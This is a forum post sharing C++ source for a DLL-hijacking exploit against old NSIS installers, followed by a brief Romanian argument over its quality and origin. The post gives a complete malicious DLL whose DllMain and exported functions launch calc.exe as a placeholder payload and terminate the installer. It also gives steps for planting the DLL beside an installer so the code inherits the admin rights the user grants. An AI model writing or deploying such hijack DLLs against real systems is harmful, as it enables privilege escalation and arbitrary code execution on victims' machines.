Jako

[C++] NSIS Installer DLL Hijack Vuln


// dllmain.cpp : Defines the entry point for the DLL application.
#include "stdafx.h"

// Payload routine shared by every exported function below; defined after DllMain.
DWORD go(void);

// Shorthand for marking a function as a DLL export.
#define EX __declspec (dllexport)

// Exported entry point; only forwards to go(). Because go() ends with
// ExitProcess(), any host that calls this export is terminated.
EX void __cdecl DllInstall() { go(); }
// Exported entry point; only forwards to go() (which never returns).
EX void __cdecl DllRegisterServer() { go(); }
// Exported entry point; only forwards to go() (which never returns).
EX void __cdecl DllUnregisterServer() { go(); }
// Exported entry point; only forwards to go() (which never returns).
EX void __cdecl RunDLLW() { go(); }


// Process-creation state for CreateProcessA. Kept at file scope so DllMain and
// go() can share it; both zero it with RtlSecureZeroMemory before each use.
// NOTE(review): the hProcess/hThread handles CreateProcessA stores in pi are
// never closed anywhere in this file.
STARTUPINFOA si;
PROCESS_INFORMATION pi;

// DLL entry point. On DLL_PROCESS_ATTACH it launches calc.exe as the
// proof-of-concept payload; the same launch is repeated in go() if a host
// later calls one of the exports. Always returns TRUE, so the load succeeds
// whether or not CreateProcessA did.
//
// NOTE(review): si/pi are cleared on every reason code, not only on process
// attach, and the handles CreateProcessA writes into pi are never closed.
// Creating a process from DllMain also runs while the loader lock is held,
// which Microsoft's DllMain guidance advises against; presumably tolerated
// here because this is a one-shot proof of concept.
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{

    RtlSecureZeroMemory(&si, sizeof(STARTUPINFOA));
    RtlSecureZeroMemory(&pi, sizeof(PROCESS_INFORMATION));


    switch (ul_reason_for_call)
    {
        
    case DLL_PROCESS_ATTACH:
        
        //    MessageBox(0, L"Hello", L"World", MB_OK);
        // Payload: start calc.exe as soon as the DLL is mapped into the host.
        // The BOOL result (and any error) is ignored.
        CreateProcessA("C:\\windows\\system32\\calc.exe", 0, 0, 0, 0, 0, 0, 0, &si, &pi);

        // No break here: control falls through into the cases below, which
        // only break, so the effect is the same as an explicit break.

    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

// Payload reached through the exported functions: launch calc.exe, then
// terminate the host process (the installer that loaded this DLL). Control
// never returns to the caller, so the DWORD return value is never produced.
//
// NOTE(review): the hProcess/hThread handles CreateProcessA stores in pi are
// never closed, and `return 0` is unreachable because ExitProcess does not
// return.
DWORD go(void) {


    //MessageBox(0, L"Hello", L"World", MB_OK);

    RtlSecureZeroMemory(&si, sizeof(STARTUPINFOA));
    RtlSecureZeroMemory(&pi, sizeof(PROCESS_INFORMATION));

    // Result ignored: a failed launch is not reported to anyone.
    CreateProcessA("C:\\windows\\system32\\calc.exe", 0, 0, 0, 0, 0, 0, 0, &si, &pi);

    // Kill the host process outright with exit code 0.
    ExitProcess(0);
    return 0;
}

1. Compile the code into a DLL.

2. Put the DLL in the same folder as an old NSIS installer, double-click the installer and accept the prompt for admin rights. The DLL is loaded as the installer starts, so because the installer has just been granted admin rights, the DLL's code runs with those rights as well.

One thing to remember when compiling this DLL: the entry point must be set to DllMain().


18 minutes ago, Jako said:

Nu e scris de mine, si daca ar fi n-ar conta. Iti multumesc pentru interventie si te rog frumos sa postezi tu o varianta mai buna.

Cum sa nu conteze? Daca te opresti sa copiezi cacaturi de la toti prostii, poate nu vei deveni ca ei.

Edited by Byte-ul
